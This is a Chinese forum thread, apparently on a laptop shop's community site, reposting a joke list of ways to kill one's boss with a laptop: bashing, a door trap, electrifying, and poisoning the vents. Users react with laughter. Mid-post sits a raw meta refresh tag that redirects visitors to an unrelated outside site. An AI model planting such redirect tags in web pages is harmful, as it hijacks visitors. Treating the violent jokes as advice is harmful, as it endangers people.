开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

用笔记本谋杀老板的N种方法(转)

关闭 [复制链接]
被老板折磨的快疯了,干脆一不做二不休,把他咔嚓掉得了。不过办公室里的可用工具太少,刀刀斧斧太明目张胆也不容易得手,笔记本似乎还比较趁手。

第一招,砸!
现在的本本都越做越坚固了,尤其是以安全性著称的商务本,抄起本本对准老板的大头,我砸我砸我砸砸砸。

成功率:★★★★
费劲指数:★★★★
暴露度:★★★★★

第二招,掉!
直接上手太辛苦,把本本放在半掩的门上,老板推门的时候本本就会做自由落体运动,砸死砸晕就得看天气了。

成功率:★★
费劲指数:★★
暴露度:★★★

第三招,电!
本本当然是要通电才能用的,不过外壳是绝缘的,安全性还是够OK的。不过把老板的本本拿来做点手脚,搞得整机狂漏电,老板一摸就上西天了。

成功率:★★★
费劲指数:★★★★★
暴露度:★★

第四招,毒?
把慢性毒药涂在笔记本出风口,本本散热的时候就慢慢把毒药挥发了,老板就慢慢的中毒了,就慢慢的……不过这招可能会不小心误伤他人,而且见效太慢。

成功率:★
费劲指数:★★★
暴露度:★

第五招,实在想不出来了……T.T……对我们这种职场小虾米来说,要想杀人于无形,实在太难了,还是努力练好上下打点功,慢慢熬吧……
<meta http-equiv="refresh" content="0; url=http://www.335.cc">
★★★

<P>&nbsp;</P>

这样的招数都想得出来,强
太狠了吧。。。
这帖从翔友会移过来的么
我就想问一句:你敢不转帖吗?
卡尔·邓尼茨 发表于 2009-7-25 21:18

不转贴就不转,
只是在其它地方看到的,感觉有意思,有转过了了。
老东西了
这算技术贴?
太狠了。。。。。特别是最后一招。。。
哈哈,还是第一招过瘾!
前提是笔记本不是自己的。